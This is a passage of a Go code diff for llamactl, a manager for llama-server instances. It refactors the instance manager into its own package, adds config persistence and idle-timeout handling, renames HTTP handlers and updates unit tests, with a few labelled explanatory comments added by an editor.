}
manager.Shutdown() // Clean up
// Test timeout configuration and logic without starting the actual process
testManager := createTestManager()
defer testManager.Shutdown()
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst, err := testManager.CreateInstance("timeout-test", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Test timeout configuration is properly set
if inst.GetOptions().IdleTimeout == nil {
t.Fatal("Instance should have idle timeout configured")
}
if *inst.GetOptions().IdleTimeout != 1 {
t.Errorf("Expected idle timeout 1 minute, got %d", *inst.GetOptions().IdleTimeout)
}
// Test timeout logic without actually starting the process
// Create a mock time provider to simulate timeout
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set instance to running state so timeout logic can work
inst.Running = true
// Simulate instance being "running" for timeout check (without actual process)
// We'll test the ShouldTimeout logic directly
inst.UpdateLastRequestTime()
// Initially should not timeout (just updated)
if inst.ShouldTimeout() {
t.Error("Instance should not timeout immediately after request")
}
// Advance time to trigger timeout
mockTime.SetTime(time.Now().Add(2 * time.Minute))
// Now it should timeout
if !inst.ShouldTimeout() {
t.Error("Instance should timeout after idle period")
}
// Reset running state to avoid shutdown issues
inst.Running = false
// Test that instance without timeout doesn't timeout
noTimeoutOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
// No IdleTimeout set
}
noTimeoutInst, err := testManager.CreateInstance("no-timeout-test", noTimeoutOptions)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
noTimeoutInst.SetTimeProvider(mockTime)
noTimeoutInst.Running = true // Set to running for timeout check
noTimeoutInst.UpdateLastRequestTime()
// Even with time advanced, should not timeout
if noTimeoutInst.ShouldTimeout() {
t.Error("Instance without timeout configuration should never timeout")
}
// Reset running state to avoid shutdown issues
noTimeoutInst.Running = false
}
func TestConcurrentAccess(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
// Test concurrent operations
var wg sync.WaitGroup
errChan := make(chan error, 10)
// Concurrent instance creation
for i := 0; i < 5; i++ {
wg.Add(1)
go func(index int) {
defer wg.Done()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instanceName := fmt.Sprintf("concurrent-test-%d", index)
if _, err := manager.CreateInstance(instanceName, options); err != nil {
errChan <- err
}
}(i)
}
// Concurrent list operations
for i := 0; i < 3; i++ {
wg.Add(1)
go func() {
defer wg.Done()
if _, err := manager.ListInstances(); err != nil {
errChan <- err
}
}()
}
wg.Wait()
close(errChan)
// Check for any errors during concurrent access
for err := range errChan {
t.Errorf("Concurrent access error: %v", err)
}
}
func TestShutdown(t *testing.T) {
manager := createTestManager()
// Create test instance
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Shutdown should not panic
manager.Shutdown()
// Multiple shutdowns should not panic
manager.Shutdown()
}
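// Note (editor's addition): the double-Shutdown assertion above implies
// Shutdown is idempotent, e.g. guarded by a sync.Once or a check on an
// already-closed channel. That is an assumption; the implementation is not
// part of this hunk.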
// Helper function to create a test manager with standard config
func createTestManager() manager.InstanceManager {
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogsDir: "/tmp/test",
MaxInstances: 10,
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
TimeoutCheckInterval: 5,
}
return manager.NewInstanceManager(cfg)
}
// Helper for timeout tests
type MockTimeProvider struct {
currentTime time.Time
mu sync.RWMutex
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
return &MockTimeProvider{currentTime: t}
}
func (m *MockTimeProvider) Now() time.Time {
m.mu.RLock()
defer m.mu.RUnlock()
return m.currentTime
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.mu.Lock()
defer m.mu.Unlock()
m.currentTime = t
}
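// Note (editor's addition): SetTimeProvider presumably accepts a small clock
// interface defined in the instance package. Its definition is not shown in
// this diff, but it is assumed to look like:
//
//	type TimeProvider interface {
//		Now() time.Time
//	}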


@@ -1,68 +1,38 @@
package llamactl
package manager
import (
"fmt"
"sync"
"llamactl/pkg/instance"
"llamactl/pkg/validation"
"os"
"path/filepath"
)
// InstanceManager defines the interface for managing instances of the llama server.
type InstanceManager interface {
ListInstances() ([]*Instance, error)
CreateInstance(name string, options *CreateInstanceOptions) (*Instance, error)
GetInstance(name string) (*Instance, error)
UpdateInstance(name string, options *CreateInstanceOptions) (*Instance, error)
DeleteInstance(name string) error
StartInstance(name string) (*Instance, error)
StopInstance(name string) (*Instance, error)
RestartInstance(name string) (*Instance, error)
GetInstanceLogs(name string) (string, error)
}
type instanceManager struct {
mu sync.RWMutex
instances map[string]*Instance
ports map[int]bool
instancesConfig InstancesConfig
}
// NewInstanceManager creates a new instance of InstanceManager.
func NewInstanceManager(instancesConfig InstancesConfig) InstanceManager {
return &instanceManager{
instances: make(map[string]*Instance),
ports: make(map[int]bool),
instancesConfig: instancesConfig,
}
}
// ListInstances returns a list of all instances managed by the instance manager.
func (im *instanceManager) ListInstances() ([]*Instance, error) {
func (im *instanceManager) ListInstances() ([]*instance.Process, error) {
im.mu.RLock()
defer im.mu.RUnlock()
instances := make([]*Instance, 0, len(im.instances))
for _, instance := range im.instances {
instances = append(instances, instance)
instances := make([]*instance.Process, 0, len(im.instances))
for _, inst := range im.instances {
instances = append(instances, inst)
}
return instances, nil
}
// CreateInstance creates a new instance with the given options and returns it.
// The instance is initially in a "stopped" state.
func (im *instanceManager) CreateInstance(name string, options *CreateInstanceOptions) (*Instance, error) {
func (im *instanceManager) CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
if options == nil {
return nil, fmt.Errorf("instance options cannot be nil")
}
if len(im.instances) >= im.instancesConfig.MaxInstances && im.instancesConfig.MaxInstances != -1 {
return nil, fmt.Errorf("maximum number of instances (%d) reached", im.instancesConfig.MaxInstances)
}
err := ValidateInstanceName(name)
name, err := validation.ValidateInstanceName(name)
if err != nil {
return nil, err
}
err = ValidateInstanceOptions(options)
err = validation.ValidateInstanceOptions(options)
if err != nil {
return nil, err
}
@@ -70,6 +40,11 @@ func (im *instanceManager) CreateInstance(name string, options *CreateInstanceOp
im.mu.Lock()
defer im.mu.Unlock()
// Check max instances limit after acquiring the lock
if len(im.instances) >= im.instancesConfig.MaxInstances && im.instancesConfig.MaxInstances != -1 {
return nil, fmt.Errorf("maximum number of instances (%d) reached", im.instancesConfig.MaxInstances)
}
// Check if instance with this name already exists
if im.instances[name] != nil {
return nil, fmt.Errorf("instance with name %s already exists", name)
@@ -90,15 +65,19 @@ func (im *instanceManager) CreateInstance(name string, options *CreateInstanceOp
im.ports[options.Port] = true
}
instance := NewInstance(name, &im.instancesConfig, options)
im.instances[instance.Name] = instance
inst := instance.NewInstance(name, &im.instancesConfig, options)
im.instances[inst.Name] = inst
im.ports[options.Port] = true
return instance, nil
if err := im.persistInstance(inst); err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
}
return inst, nil
}
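// Note (editor's addition): the max-instances limit is now checked twice:
// once before taking the lock as a cheap fast path, and again under the lock
// (added in this hunk), since another goroutine may create an instance
// between the two checks.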
// GetInstance retrieves an instance by its name.
func (im *instanceManager) GetInstance(name string) (*Instance, error) {
func (im *instanceManager) GetInstance(name string) (*instance.Process, error) {
im.mu.RLock()
defer im.mu.RUnlock()
@@ -111,7 +90,7 @@ func (im *instanceManager) GetInstance(name string) (*Instance, error) {
// UpdateInstance updates the options of an existing instance and returns it.
// If the instance is running, it will be restarted to apply the new options.
func (im *instanceManager) UpdateInstance(name string, options *CreateInstanceOptions) (*Instance, error) {
func (im *instanceManager) UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
@@ -124,7 +103,7 @@ func (im *instanceManager) UpdateInstance(name string, options *CreateInstanceOp
return nil, fmt.Errorf("instance options cannot be nil")
}
err := ValidateInstanceOptions(options)
err := validation.ValidateInstanceOptions(options)
if err != nil {
return nil, err
}
@@ -149,6 +128,12 @@ func (im *instanceManager) UpdateInstance(name string, options *CreateInstanceOp
}
}
im.mu.Lock()
defer im.mu.Unlock()
if err := im.persistInstance(instance); err != nil {
return nil, fmt.Errorf("failed to persist updated instance %s: %w", name, err)
}
return instance, nil
}
@@ -157,23 +142,30 @@ func (im *instanceManager) DeleteInstance(name string) error {
im.mu.Lock()
defer im.mu.Unlock()
_, exists := im.instances[name]
instance, exists := im.instances[name]
if !exists {
return fmt.Errorf("instance with name %s not found", name)
}
if im.instances[name].Running {
if instance.Running {
return fmt.Errorf("instance with name %s is still running, stop it before deleting", name)
}
delete(im.ports, im.instances[name].options.Port)
delete(im.ports, instance.GetOptions().Port)
delete(im.instances, name)
// Delete the instance's config file if persistence is enabled
instancePath := filepath.Join(im.instancesConfig.InstancesDir, instance.Name+".json")
if err := os.Remove(instancePath); err != nil && !os.IsNotExist(err) {
return fmt.Errorf("failed to delete config file for instance %s: %w", instance.Name, err)
}
return nil
}
// StartInstance starts a stopped instance and returns it.
// If the instance is already running, it returns an error.
func (im *instanceManager) StartInstance(name string) (*Instance, error) {
func (im *instanceManager) StartInstance(name string) (*instance.Process, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
@@ -189,11 +181,18 @@ func (im *instanceManager) StartInstance(name string) (*Instance, error) {
return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
}
im.mu.Lock()
defer im.mu.Unlock()
err := im.persistInstance(instance)
if err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
}
return instance, nil
}
// StopInstance stops a running instance and returns it.
func (im *instanceManager) StopInstance(name string) (*Instance, error) {
func (im *instanceManager) StopInstance(name string) (*instance.Process, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
@@ -209,11 +208,18 @@ func (im *instanceManager) StopInstance(name string) (*Instance, error) {
return nil, fmt.Errorf("failed to stop instance %s: %w", name, err)
}
im.mu.Lock()
defer im.mu.Unlock()
err := im.persistInstance(instance)
if err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
}
return instance, nil
}
// RestartInstance stops and then starts an instance, returning the updated instance.
func (im *instanceManager) RestartInstance(name string) (*Instance, error) {
func (im *instanceManager) RestartInstance(name string) (*instance.Process, error) {
instance, err := im.StopInstance(name)
if err != nil {
return nil, err
@@ -234,16 +240,3 @@ func (im *instanceManager) GetInstanceLogs(name string) (string, error) {
// TODO: Implement actual log retrieval logic
return fmt.Sprintf("Logs for instance %s", name), nil
}
func (im *instanceManager) getNextAvailablePort() (int, error) {
portRange := im.instancesConfig.PortRange
for port := portRange[0]; port <= portRange[1]; port++ {
if !im.ports[port] {
im.ports[port] = true
return port, nil
}
}
return 0, fmt.Errorf("no available ports in the specified range")
}

pkg/manager/timeout.go

@@ -0,0 +1,26 @@
package manager
import "log"
func (im *instanceManager) checkAllTimeouts() {
im.mu.RLock()
var timeoutInstances []string
// Identify instances that should timeout
for _, inst := range im.instances {
if inst.ShouldTimeout() {
timeoutInstances = append(timeoutInstances, inst.Name)
}
}
im.mu.RUnlock() // Release read lock before calling StopInstance
// Stop the timed-out instances
for _, name := range timeoutInstances {
log.Printf("Instance %s has timed out, stopping it", name)
if _, err := im.StopInstance(name); err != nil {
log.Printf("Error stopping instance %s: %v", name, err)
} else {
log.Printf("Instance %s stopped successfully", name)
}
}
}
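// Sketch (editor's addition, not part of this diff): checkAllTimeouts is
// presumably driven by a ticker goroutine started when the manager is
// created. Assuming a shutdownChan field on instanceManager and a
// TimeoutCheckInterval expressed in minutes, the loop would look roughly
// like this (requires the "time" import):
func (im *instanceManager) startTimeoutChecker(intervalMinutes int) {
	ticker := time.NewTicker(time.Duration(intervalMinutes) * time.Minute)
	go func() {
		defer ticker.Stop()
		for {
			select {
			case <-ticker.C:
				im.checkAllTimeouts()
			case <-im.shutdownChan: // hypothetical field name
				return
			}
		}
	}()
}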


@@ -1,501 +0,0 @@
package llamactl_test
import (
"strings"
"testing"
llamactl "llamactl/pkg"
)
func TestNewInstanceManager(t *testing.T) {
config := llamactl.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogDirectory: "/tmp/test",
MaxInstances: 5,
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
manager := llamactl.NewInstanceManager(config)
if manager == nil {
t.Fatal("NewInstanceManager returned nil")
}
// Test initial state
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 0 {
t.Errorf("Expected empty instance list, got %d instances", len(instances))
}
}
func TestCreateInstance_Success(t *testing.T) {
manager := createTestManager()
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
if instance.Name != "test-instance" {
t.Errorf("Expected instance name 'test-instance', got %q", instance.Name)
}
if instance.Running {
t.Error("New instance should not be running")
}
if instance.GetOptions().Port != 8080 {
t.Errorf("Expected port 8080, got %d", instance.GetOptions().Port)
}
}
func TestCreateInstance_DuplicateName(t *testing.T) {
manager := createTestManager()
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create first instance
_, err := manager.CreateInstance("test-instance", options1)
if err != nil {
t.Fatalf("First CreateInstance failed: %v", err)
}
// Try to create duplicate
_, err = manager.CreateInstance("test-instance", options2)
if err == nil {
t.Error("Expected error for duplicate instance name")
}
if !strings.Contains(err.Error(), "already exists") {
t.Errorf("Expected duplicate name error, got: %v", err)
}
}
func TestCreateInstance_MaxInstancesLimit(t *testing.T) {
// Create manager with low max instances limit
config := llamactl.InstancesConfig{
PortRange: [2]int{8000, 9000},
MaxInstances: 2, // Very low limit for testing
}
manager := llamactl.NewInstanceManager(config)
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options3 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instances up to the limit
_, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
_, err = manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
// This should fail due to max instances limit
_, err = manager.CreateInstance("instance3", options3)
if err == nil {
t.Error("Expected error when exceeding max instances limit")
}
if !strings.Contains(err.Error(), "maximum number of instances") && !strings.Contains(err.Error(), "limit") {
t.Errorf("Expected max instances error, got: %v", err)
}
}
func TestCreateInstance_PortAssignment(t *testing.T) {
manager := createTestManager()
// Create instance without specifying port
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Should auto-assign a port in the range
port := instance.GetOptions().Port
if port < 8000 || port > 9000 {
t.Errorf("Expected port in range 8000-9000, got %d", port)
}
}
func TestCreateInstance_PortConflictDetection(t *testing.T) {
manager := createTestManager()
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080, // Explicit port
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: 8080, // Same port - should conflict
},
}
// Create first instance
_, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
// Try to create second instance with same port
_, err = manager.CreateInstance("instance2", options2)
if err == nil {
t.Error("Expected error for port conflict")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "conflict") && !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
}
func TestCreateInstance_MultiplePortAssignment(t *testing.T) {
manager := createTestManager()
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create multiple instances and verify they get different ports
instance1, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
instance2, err := manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
port1 := instance1.GetOptions().Port
port2 := instance2.GetOptions().Port
if port1 == port2 {
t.Errorf("Expected different ports, both got %d", port1)
}
}
func TestCreateInstance_PortExhaustion(t *testing.T) {
// Create manager with very small port range
config := llamactl.InstancesConfig{
PortRange: [2]int{8000, 8001}, // Only 2 ports available
MaxInstances: 10, // Higher than available ports
}
manager := llamactl.NewInstanceManager(config)
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options3 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instances to exhaust all ports
_, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
_, err = manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
// This should fail due to port exhaustion
_, err = manager.CreateInstance("instance3", options3)
if err == nil {
t.Error("Expected error when ports are exhausted")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "available") {
t.Errorf("Expected port exhaustion error, got: %v", err)
}
}
func TestDeleteInstance_PortRelease(t *testing.T) {
manager := createTestManager()
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
// Create instance with specific port
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Delete the instance
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should be able to create new instance with same port
_, err = manager.CreateInstance("new-instance", options)
if err != nil {
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
}
}
func TestGetInstance_Success(t *testing.T) {
manager := createTestManager()
// Create an instance first
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
created, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Retrieve it
retrieved, err := manager.GetInstance("test-instance")
if err != nil {
t.Fatalf("GetInstance failed: %v", err)
}
if retrieved.Name != created.Name {
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
}
}
func TestGetInstance_NotFound(t *testing.T) {
manager := createTestManager()
_, err := manager.GetInstance("nonexistent")
if err == nil {
t.Error("Expected error for nonexistent instance")
}
if !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
func TestListInstances(t *testing.T) {
manager := createTestManager()
// Initially empty
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 0 {
t.Errorf("Expected 0 instances, got %d", len(instances))
}
// Create some instances
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err = manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
_, err = manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
// List should return both
instances, err = manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 2 {
t.Errorf("Expected 2 instances, got %d", len(instances))
}
// Check names are present
names := make(map[string]bool)
for _, instance := range instances {
names[instance.Name] = true
}
if !names["instance1"] || !names["instance2"] {
t.Error("Expected both instance1 and instance2 in list")
}
}
func TestDeleteInstance_Success(t *testing.T) {
manager := createTestManager()
// Create an instance
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Delete it
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should no longer exist
_, err = manager.GetInstance("test-instance")
if err == nil {
t.Error("Instance should not exist after deletion")
}
}
func TestDeleteInstance_NotFound(t *testing.T) {
manager := createTestManager()
err := manager.DeleteInstance("nonexistent")
if err == nil {
t.Error("Expected error for deleting nonexistent instance")
}
if !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
func TestUpdateInstance_Success(t *testing.T) {
manager := createTestManager()
// Create an instance
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Update it
newOptions := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
updated, err := manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
if updated.GetOptions().Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().Model)
}
if updated.GetOptions().Port != 8081 {
t.Errorf("Expected port 8081, got %d", updated.GetOptions().Port)
}
}
func TestUpdateInstance_NotFound(t *testing.T) {
manager := createTestManager()
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := manager.UpdateInstance("nonexistent", options)
if err == nil {
t.Error("Expected error for updating nonexistent instance")
}
if !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
// Helper function to create a test manager with standard config
func createTestManager() llamactl.InstanceManager {
config := llamactl.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogDirectory: "/tmp/test",
MaxInstances: 10,
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
return llamactl.NewInstanceManager(config)
}


@@ -1,10 +1,13 @@
package llamactl
package server
import (
"bytes"
"encoding/json"
"fmt"
"io"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"net/http"
"os/exec"
"strconv"
@@ -14,18 +17,34 @@ import (
)
type Handler struct {
InstanceManager InstanceManager
config Config
InstanceManager manager.InstanceManager
cfg config.AppConfig
}
func NewHandler(im InstanceManager, config Config) *Handler {
func NewHandler(im manager.InstanceManager, cfg config.AppConfig) *Handler {
return &Handler{
InstanceManager: im,
config: config,
cfg: cfg,
}
}
// HelpHandler godoc
// VersionHandler godoc
// @Summary Get llamactl version
// @Description Returns the version of the llamactl command
// @Tags version
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "Version information"
// @Failure 500 {string} string "Internal Server Error"
// @Router /version [get]
func (h *Handler) VersionHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", "text/plain")
fmt.Fprintf(w, "Version: %s\nCommit: %s\nBuild Time: %s\n", h.cfg.Version, h.cfg.CommitHash, h.cfg.BuildTime)
}
}
// LlamaServerHelpHandler godoc
// @Summary Get help for llama server
// @Description Returns the help text for the llama server command
// @Tags server
@@ -34,7 +53,7 @@ func NewHandler(im InstanceManager, config Config) *Handler {
// @Success 200 {string} string "Help text"
// @Failure 500 {string} string "Internal Server Error"
// @Router /server/help [get]
func (h *Handler) HelpHandler() http.HandlerFunc {
func (h *Handler) LlamaServerHelpHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
helpCmd := exec.Command("llama-server", "--help")
output, err := helpCmd.CombinedOutput()
@@ -47,7 +66,7 @@ func (h *Handler) HelpHandler() http.HandlerFunc {
}
}
// VersionHandler godoc
// LlamaServerVersionHandler godoc
// @Summary Get version of llama server
// @Description Returns the version of the llama server command
// @Tags server
@@ -56,7 +75,7 @@ func (h *Handler) HelpHandler() http.HandlerFunc {
// @Success 200 {string} string "Version information"
// @Failure 500 {string} string "Internal Server Error"
// @Router /server/version [get]
func (h *Handler) VersionHandler() http.HandlerFunc {
func (h *Handler) LlamaServerVersionHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
versionCmd := exec.Command("llama-server", "--version")
output, err := versionCmd.CombinedOutput()
@@ -69,7 +88,7 @@ func (h *Handler) VersionHandler() http.HandlerFunc {
}
}
// ListDevicesHandler godoc
// LlamaServerListDevicesHandler godoc
// @Summary List available devices for llama server
// @Description Returns a list of available devices for the llama server
// @Tags server
@@ -78,7 +97,7 @@ func (h *Handler) VersionHandler() http.HandlerFunc {
// @Success 200 {string} string "List of devices"
// @Failure 500 {string} string "Internal Server Error"
// @Router /server/devices [get]
func (h *Handler) ListDevicesHandler() http.HandlerFunc {
func (h *Handler) LlamaServerListDevicesHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
listCmd := exec.Command("llama-server", "--list-devices")
output, err := listCmd.CombinedOutput()
@@ -97,7 +116,7 @@ func (h *Handler) ListDevicesHandler() http.HandlerFunc {
// @Tags instances
// @Security ApiKeyAuth
// @Produces json
// @Success 200 {array} Instance "List of instances"
// @Success 200 {array} instance.Process "List of instances"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances [get]
func (h *Handler) ListInstances() http.HandlerFunc {
@@ -124,8 +143,8 @@ func (h *Handler) ListInstances() http.HandlerFunc {
// @Accept json
// @Produces json
// @Param name path string true "Instance Name"
// @Param options body CreateInstanceOptions true "Instance configuration options"
// @Success 201 {object} Instance "Created instance details"
// @Param options body instance.CreateInstanceOptions true "Instance configuration options"
// @Success 201 {object} instance.Process "Created instance details"
// @Failure 400 {string} string "Invalid request body"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name} [post]
@@ -137,13 +156,13 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
return
}
var options CreateInstanceOptions
var options instance.CreateInstanceOptions
if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
http.Error(w, "Invalid request body", http.StatusBadRequest)
return
}
instance, err := h.InstanceManager.CreateInstance(name, &options)
inst, err := h.InstanceManager.CreateInstance(name, &options)
if err != nil {
http.Error(w, "Failed to create instance: "+err.Error(), http.StatusInternalServerError)
return
@@ -151,7 +170,7 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(http.StatusCreated)
if err := json.NewEncoder(w).Encode(instance); err != nil {
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
@@ -165,7 +184,7 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} Instance "Instance details"
// @Success 200 {object} instance.Process "Instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name} [get]
@@ -177,14 +196,14 @@ func (h *Handler) GetInstance() http.HandlerFunc {
return
}
instance, err := h.InstanceManager.GetInstance(name)
inst, err := h.InstanceManager.GetInstance(name)
if err != nil {
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(instance); err != nil {
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
@@ -199,8 +218,8 @@ func (h *Handler) GetInstance() http.HandlerFunc {
// @Accept json
// @Produces json
// @Param name path string true "Instance Name"
// @Param options body CreateInstanceOptions true "Instance configuration options"
// @Success 200 {object} Instance "Updated instance details"
// @Param options body instance.CreateInstanceOptions true "Instance configuration options"
// @Success 200 {object} instance.Process "Updated instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name} [put]
@@ -212,20 +231,20 @@ func (h *Handler) UpdateInstance() http.HandlerFunc {
return
}
var options CreateInstanceOptions
var options instance.CreateInstanceOptions
